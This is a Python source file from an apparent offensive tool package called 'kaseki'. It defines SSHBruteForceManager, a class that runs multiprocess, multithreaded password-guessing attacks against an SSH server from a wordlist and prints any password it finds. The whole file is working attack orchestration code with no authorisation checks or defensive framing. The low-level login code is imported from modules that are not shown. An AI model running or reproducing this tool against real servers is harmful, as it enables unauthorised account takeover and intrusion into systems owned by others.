import argparse
import multiprocessing
import paramiko  # SSH interactions
from time import sleep  # Pauses
import threading
from termcolor import cprint  # Colorized terminal output
import queue  # Thread-safe data handling
import sys
from typing import List, Optional

from kaseki.brutemanager.target import Target
from kaseki.ssh.sshbruteforce import *
from kaseki.utils.producer import PasswordProducer
from kaseki.utils.consumer import PasswordConsumer
from kaseki.utils import queuecontent




class SSHBruteForceManager:
    """
    Manages an SSH brute-force attack by orchestrating password production 
    and result consumption with multiprocessing for performance.

    Attributes:
        target (SSHTarget): SSH server information, including hostname, port, and username.
        passlist_filename (str): Path to the password list file.
        passwords_queue (multiprocessing.Queue): Queue for passwords generated by PasswordProducer.
        results_queue (multiprocessing.Queue): Queue for results from SSHBruteForcers.
        password_failed_n (int): Counter for failed password attempts.
    """

    def __init__(self, target: Target, passlist_filename: str):
        """
        Initializes the brute force manager with SSH target details and password list path.
        
        Args:
            target (SSHTarget): SSH server details.
            passlist_filename (str): Path to the password list file.
        """
        self.target = target  # Target SSH server details
        self.passlist_filename = passlist_filename  # Password list file path

        # Queues for password production and result handling
        self.passwords_queue: multiprocessing.Queue = multiprocessing.Queue()
        self.results_queue: multiprocessing.Queue = multiprocessing.Queue()

        # Stores running brute force processes
        self.running_bruteforce_proc: List[multiprocessing.Process] = []
        self.password_failed_n: int = 0  # Tracks failed password attempts

        

    def success_result_callback(self, queuedata) -> queuecontent.Signal:
        """
        Callback for successful password detection during brute-force attack.
        
        Args:
            queuedata (queuecontent.QueueData): Data from queue with signal and password.
        
        Returns:
            queuecontent.Signal: Signal to guide PasswordResultConsumer actions.
        """
        cprint(f"\n[+] Found the password {queuedata.content}", "green", attrs=["bold"])
        return queuecontent.Signal.Finished

    def failed_result_callback(self, queuedata) -> queuecontent.Signal:
        """
        Callback for failed password attempt during brute-force attack.
        
        Args:
            queuedata (queuecontent.QueueData): Data from queue with signal and password.
        
        Returns:
            queuecontent.Signal: Signal to guide PasswordResultConsumer actions.
        """
        cprint(f"[{self.password_failed_n}] not the password {queuedata.content}", "red")
        self.password_failed_n += 1
        return queuecontent.Signal.Blank

    def start_password_producer(self) -> None:
        """
        Initializes and starts the PasswordProducer in a separate process.
        """
        self.password_producer = PasswordProducer(self.passlist_filename, self.passwords_queue)
        self._password_producer_proc = multiprocessing.Process(target=self.password_producer.produce)
        self._password_producer_proc.start()

    def start_password_result_consumer(self) -> None:
        """
        Initializes and starts the PasswordResultConsumer in a separate process.
        """
        self.password_result_consumer = PasswordConsumer(
            self.results_queue,
            self.passwords_queue,
            success_callback=self.success_result_callback,
            failed_callback=self.failed_result_callback
        )
        self._password_result_consumer_proc = multiprocessing.Process(target=self.password_result_consumer.consume)
        self._password_result_consumer_proc.start()

    def start(self, login_thread_n_each: int = 0, process_n: int = 0) -> None:
        """
        Starts the password producer, result consumer, and brute-forcing processes.
        
        Args:
            login_thread_n_each (int): Number of threads per brute-forcer process.
            process_n (int): Number of brute-forcer processes; 0 uses a single process.
        """
        self.start_password_producer()
        self.start_password_result_consumer()
        self.run_bruteforcers(login_thread_n_each, process_n)
        
        # Stops producer and consumer processes after brute-forcing completes
        cprint(f"[SSHBruteForceManager]: Stopping password_producer and result_consumer", "yellow", attrs=["bold"])
        self.password_producer.stop()
        self._password_producer_proc.kill()
        self.password_result_consumer.stop()
        self._password_result_consumer_proc.kill()

    def run_bruteforcers(self, login_thread_n_each: int = 0, process_n: int = 0) -> None:
        """
        Runs brute-forcers, single or multi-processed based on given process count.
        
        Args:
            login_thread_n_each (int): Threads per brute-forcer process.
            process_n (int): Number of processes to spawn; 0 runs single-process.
        """
        if process_n > 0:
            self.run_multiprocessed_bruteforcers(login_thread_n_each, process_n)
        else:
            self.run_single_bruteforcer(login_thread_n_each)

    def run_multiprocessed_bruteforcers(self, login_thread_n_each: int = 0, process_n: int = 0) -> None:
        """
        Runs brute-forcers as separate processes with multiple threads.
        
        Args:
            login_thread_n_each (int): Threads per brute-forcer process.
            process_n (int): Number of brute-forcer processes to spawn.
        """
        for _ in range(process_n):
            brute_forcer: SSHBruteForcer = self.create_bruteforcer(login_thread_n=login_thread_n_each)
            brute_forcer_proc = brute_forcer.multiprocessed_run()
            self.running_bruteforce_proc.append(brute_forcer_proc)

        # Waits for all brute-forcer processes to complete
        self.wait_for_bruteforcer_procs()

    def run_single_bruteforcer(self, login_thread_n_each: int = 0) -> None:
        """
        Runs a single brute-forcer without multiprocessing.
        
        Args:
            login_thread_n_each (int): Number of threads for brute-forcing.
        """
        brute_forcer: SSHBruteForcer = self.create_bruteforcer(login_thread_n=login_thread_n_each)
        brute_forcer.run()

    def create_bruteforcer(self, login_thread_n=0) -> SSHBruteForcer:
        """
        Creates a pre-configured SSHBruteForcer instance.
        
        Args:
            login_thread_n (int): Number of threads for brute-forcing.
        
        Returns:
            SSHBruteForcer: Configured brute-forcer instance.
        """
        return SSHBruteForcer(
            target=self.target,
            passwords_queue=self.passwords_queue,
            results_queue=self.results_queue,
            login_thread_n=login_thread_n,
        )

    def wait_for_bruteforcer_procs(self) -> None:
        """
        Waits for all running brute-forcer processes to complete.
        """
        for bruteforcer_proc in self.running_bruteforce_proc:
            bruteforcer_proc.join()
